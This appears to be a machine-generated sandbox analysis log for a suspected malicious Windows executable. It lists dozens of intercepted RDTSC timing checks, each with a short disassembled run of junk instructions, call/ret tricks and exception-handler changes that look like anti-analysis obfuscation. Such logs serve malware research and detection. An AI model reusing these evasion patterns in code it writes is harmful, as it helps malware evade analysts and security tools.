                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5041BC second address: 504222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F0FE14B0508h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 movsx ebx, si 0x00000027 push dword ptr fs:[00000000h] 0x0000002e pushad 0x0000002f mov dword ptr [ebp+122D20BCh], ebx 0x00000035 popad 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov di, AAA1h 0x00000041 mov eax, dword ptr [ebp+122D011Dh] 0x00000047 mov bx, cx 0x0000004a push FFFFFFFFh 0x0000004c jmp 00007F0FE14B050Bh 0x00000051 nop 0x00000052 push ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 jnp 00007F0FE14B0506h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 504222 second address: 504226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50BC28 second address: 50BC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50BC2C second address: 50BC7C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0FE0B8ED36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0FE0B8ED38h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 sub dword ptr [ebp+122D227Ah], ecx 0x0000002c push 00000000h 0x0000002e movsx edi, bx 0x00000031 push 00000000h 0x00000033 pushad 0x00000034 sub dword ptr [ebp+12448DACh], edx 0x0000003a mov dword ptr [ebp+122D2ABCh], edx 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 push esi 0x00000043 jp 00007F0FE0B8ED3Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50BC7C second address: 50BC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 508600 second address: 508604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50BC87 second address: 50BC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 508604 second address: 50860A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50860A second address: 5086B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F0FE14B050Bh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F0FE14B0508h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 sub dword ptr [ebp+12448DF3h], ecx 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F0FE14B0517h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f pushad 0x00000040 jns 00007F0FE14B050Bh 0x00000046 mov edi, 15ED6D86h 0x0000004b popad 0x0000004c mov eax, dword ptr [ebp+122D11F9h] 0x00000052 push 00000000h 0x00000054 push ebp 0x00000055 call 00007F0FE14B0508h 0x0000005a pop ebp 0x0000005b mov dword ptr [esp+04h], ebp 0x0000005f add dword ptr [esp+04h], 00000017h 0x00000067 inc ebp 0x00000068 push ebp 0x00000069 ret 0x0000006a pop ebp 0x0000006b ret 0x0000006c push FFFFFFFFh 0x0000006e mov ebx, dword ptr [ebp+12458281h] 0x00000074 push eax 0x00000075 jng 00007F0FE14B0518h 0x0000007b push eax 0x0000007c push edx 0x0000007d jne 00007F0FE14B0506h 0x00000083 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50E6D8 second address: 50E6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50CE3B second address: 50CE58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0FE14B050Fh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50CE58 second address: 50CE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 50CE5C second address: 50CE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5488CE second address: 5488E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0511h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5488E8 second address: 548904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED42h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 548A6B second address: 548ABC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0FE14B0516h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007F0FE14B0518h 0x00000011 jo 00007F0FE14B0506h 0x00000017 pop ebx 0x00000018 pop edi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0FE14B0511h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 548C49 second address: 548C4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 548E2B second address: 548E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 551505 second address: 55150B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55150B second address: 551511 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 551511 second address: 551517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 551517 second address: 551521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0FE14B0506h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 551521 second address: 551525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 54FAAA second address: 54FABC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 54FABC second address: 54FAC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 54FAC9 second address: 54FACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 54FACF second address: 54FAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 54FAD3 second address: 54FAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0513h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55033C second address: 55035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED49h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55035C second address: 550380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0FE14B0506h 0x0000000a jmp 00007F0FE14B0513h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 550380 second address: 5503AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED3Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0FE0B8ED47h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55063C second address: 550640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 550640 second address: 55065C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0FE0B8ED36h 0x00000008 jmp 00007F0FE0B8ED42h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 550BEB second address: 550BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 550BEF second address: 550BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 555C5A second address: 555C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0FE14B0506h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0FE14B0517h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0FE14B0512h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 555C93 second address: 555CAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED42h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 555CAB second address: 555CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 555CB1 second address: 555CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0FE0B8ED36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 558CFC second address: 558D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 558D00 second address: 558D04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 558D04 second address: 558D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 558D0A second address: 558D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 558D10 second address: 558D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55901E second address: 559024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 559024 second address: 559042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B0514h 0x00000007 jng 00007F0FE14B0506h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 559042 second address: 55904E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0FE0B8ED36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55904E second address: 559054 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 559054 second address: 55905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5591D2 second address: 5591D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55933A second address: 559359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0FE0B8ED43h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5594DF second address: 5594E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5594E4 second address: 559500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED46h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 559500 second address: 559504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 55962B second address: 559631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 559631 second address: 559644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0FE14B0506h 0x0000000d jnc 00007F0FE14B0506h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4A8F5C second address: 4A8F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 4A8F62 second address: 4A8F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE14B050Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 562AAF second address: 562AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE0B8ED45h 0x00000009 pop esi 0x0000000a js 00007F0FE0B8ED3Ch 0x00000010 jne 00007F0FE0B8ED36h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5619F7 second address: 5619FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5619FD second address: 561A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5606D5 second address: 5606DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5606DC second address: 5606E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F0FE0B8ED36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5606E7 second address: 5606ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5680E5 second address: 5680EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5680EB second address: 56810F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0FE14B0511h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F0FE14B0506h 0x00000012 jp 00007F0FE14B0506h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 56810F second address: 568152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0FE0B8ED42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0FE0B8ED46h 0x00000010 jmp 00007F0FE0B8ED45h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 568152 second address: 568156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 568294 second address: 568298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 568298 second address: 5682A4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0FE14B0506h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 568405 second address: 56840B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 56840B second address: 56840F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 56840F second address: 568422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0FE0B8ED36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 577D38 second address: 577D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5815D7 second address: 5815F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007F0FE0B8ED3Eh 0x0000000d jbe 00007F0FE0B8ED3Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590015 second address: 59001B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590314 second address: 590336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F0FE0B8ED4Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590336 second address: 590355 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0FE14B0517h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590355 second address: 590359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590359 second address: 59036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0FE14B0506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59036F second address: 590373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590373 second address: 590379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590379 second address: 59038B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F0FE0B8ED3Ch 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59038B second address: 5903A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0FE14B0517h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590671 second address: 590688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F0FE0B8ED3Ah 0x0000000b js 00007F0FE0B8ED3Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590688 second address: 5906B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0FE14B0519h 0x0000000e jnl 00007F0FE14B050Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59083E second address: 590842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590974 second address: 59097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 59097A second address: 590986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 590986 second address: 590991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0FE14B0506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5913C9 second address: 5913CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\6GNqkkKY0j.exeRDTSC instruction interceptor: First address: 5913CD second address: 5913D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
